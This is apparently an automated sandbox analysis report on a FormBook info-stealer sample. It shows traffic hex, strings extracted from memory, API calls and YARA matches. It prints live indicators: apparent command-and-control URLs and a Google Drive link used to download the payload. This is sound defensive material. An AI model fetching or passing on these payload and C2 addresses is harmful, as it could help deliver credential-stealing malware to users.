f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 49 cb 15 14 30 dd 68 5e bf 88 12 2f 4e 08 a5 75 5e 94 d6 29 89 ea c8 30 80 33 a9 9f 06 e4 64 f5 b7 6f 7e f3 e6 57 ab 6f 56 df ad 7e ff e6 af 57 df a0 d5 77 ab 6f e1 e3 9b d5 3f ac 7e b7 fa 16 be 21 03 7d 90 44 e1 14 07 c7 75 5e 4b 32 3c 4e a2 98 24 e9 d5 50 8b a6 fd 20 02 8e 29 dc 4d 16 a3 2f 5e 68 d0 34 d1 3f 85 e2 0c 92 52 fa 76 94 6c 05 0b 9c 1b 01 d7 15 d0 82 7a 51 87 ba 89 1f a7 08 24 6b a8 e1 38 0e 7c 17 a7 7e 14 d6 03 ef dd 33 1a 85 1a 72 03 4c e9 50 63 8c 34 a8 3b 23 73 6c 4c 13 1c cf b4 93 6b ed a7 4c 7a 2e 53 ad 9f f5 3e 2f 02 fd af e9 da 4f 79 c9 fe cb 6b ed a7 80 43 eb 6b 5f 92 f1 33 3f 25 90 e9 7b 4a bd 31 e7 aa 39 be aa bf 7d 41 c6 40 ba a6 6b 8b 24 28 2f a3 e9 1a 6b 58 5f 93 0d d2 35 8f f0 e6 f8 51 a8 f5 35 4d d7 e2 c5 38 f0 e9 8c 24 5a ff 7a 07 ba 28 99 e2 d0 ff 8a 35 5c 5b ea 5a 1c c1 88 f0 71 f0 be 0b bc d0 54 f2 9f 11 9c b8 33 91 a1 6b 29 4e a6 24 65 e0 45 fb 3e 0a d3 e4 ea f3 c8 0f 53 4e fe 73 32 8f 03 9c 42 d3 a5 50 2a 4d 7d 8f 0e af 29 03 39 4a 49 32 1f d1 34 f1 c3 e9 12 a8 f8 e5 82 24 57 86 1f c6 0b 60 6f 42 7e b9 f0 13 e2 21 36 88 36 ab 68 cb 57 ba e6 87 4f 70 38 5d e0 29 60 e3 6a 61 a9 e7 ac ff 4c 6d e7 2e fe 17 18 92 31 7a f5 5f 57 df ac 7e bb fa fe cd af 56 df af 7e b7 fa 6e f5 3d 8c 8e 7f 5c 7d f3 e6 df ae be 35 de fc d5 9b 5f af be 59 fd ee cd df ac fe f7 ea 1b 74 aa ad fe 33 2b f8 dd ea b7 ab 6f 56 ff 74 0a fd b1 ab 37 83 68 1a a9 7c fc 64 8e a7 e4 b3 f1 19 71 81 91 Data Ascii: 33cb}kFfC&%7l4veHfF(,Z
        Source: secinit.exe, 0000000A.00000002.83835201510.0000000004608000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.00000000047A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F
        Source: secinit.exe, 0000000A.00000002.83835201510.00000000042E4000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000004484000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: fJuwM4Bwi7.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: fJuwM4Bwi7.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: secinit.exe, 0000000A.00000002.83836936890.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83835201510.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000003986000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: secinit.exe, 0000000A.00000002.83835201510.000000000479A000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.000000000493A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.insist.site/
        Source: SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83832835974.00000000014AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shun-yamagata.com
        Source: SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83832835974.00000000014AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shun-yamagata.com/8cwt/
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000263E000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000263E000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79182507617.0000000002800000.00000004.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000266B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download/
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=downloadQ
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: secinit.exe, 0000000A.00000002.83830820007.000000000010B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
        Source: secinit.exe, 0000000A.00000002.83830820007.000000000010B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.lihttps://login.li0
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83832065091.00000000027C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: secinit.exe, 0000000A.00000003.79359194925.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: secinit.exe, 0000000A.00000002.83836936890.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83835201510.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000003986000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownHTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.217.215.132:443 -> 192.168.11.30:49843 version: TLS 1.2
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_0040515D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040515D

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329534E0 NtCreateMutant,LdrInitializeThunk,8_2_329534E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952B90 NtFreeVirtualMemory,LdrInitializeThunk,8_2_32952B90
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32954260 NtSetContextThread,8_2_32954260
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32954570 NtSuspendThread,8_2_32954570
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952A80 NtClose,8_2_32952A80
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952AA0 NtQueryInformationFile,8_2_32952AA0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952AC0 NtEnumerateValueKey,8_2_32952AC0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952A10 NtWriteFile,8_2_32952A10
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952B80 NtCreateKey,8_2_32952B80
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952BC0 NtQueryInformationToken,8_2_32952BC0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952BE0 NtQueryVirtualMemory,8_2_32952BE0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952B10 NtAllocateVirtualMemory,8_2_32952B10
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952B00 NtQueryValueKey,8_2_32952B00
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32952B20 NtQueryInformationProcess,8_2_32952B20
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329538D0 NtGetContextThread,8_2_329538D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_00403217
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_004063105_2_00406310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_0040499C5_2_0040499C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290D2EC8_2_3290D2EC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_328E22458_2_328E2245
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329113808_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292E3108_2_3292E310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DF3308_2_329DF330
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329100A08_2_329100A0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292B0D08_2_3292B0D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D70F18_2_329D70F1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CE0768_2_329CE076
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C08_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E08_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F1138_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E010E8_2_329E010E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BD1308_2_329BD130
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3296717A8_2_3296717A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329206808_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DA6C08_2_329DA6C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DF6F68_2_329DF6F6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291C6E08_2_3291C6E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293C6008_2_3293C600
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BD62C8_2_329BD62C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CD6468_2_329CD646
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329446708_2_32944670
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_328E17078_2_328E1707
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D67578_2_329D6757
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329227608_2_32922760
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292A7608_2_3292A760
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329204458_2_32920445
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DF5C98_2_329DF5C9
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D75C68_2_329D75C6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329EA5268_2_329EA526
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DFA898_2_329DFA89
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293FAA08_2_3293FAA0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DCA138_2_329DCA13
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DEA5B8_2_329DEA5B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32994BC08_2_32994BC0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920B108_2_32920B10
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329DFB2E8_2_329DFB2E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329368828_2_32936882
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329228C08_2_329228C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D78F38_2_329D78F3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329238008_2_32923800
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329C08358_2_329C0835
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: String function: 3290B910 appears 136 times
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: String function: 32967BE4 appears 56 times
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: String function: 3299EF10 appears 57 times
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: String function: 3298E692 appears 49 times
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032BB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecinitj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecinitj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79082655954.00000000326AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
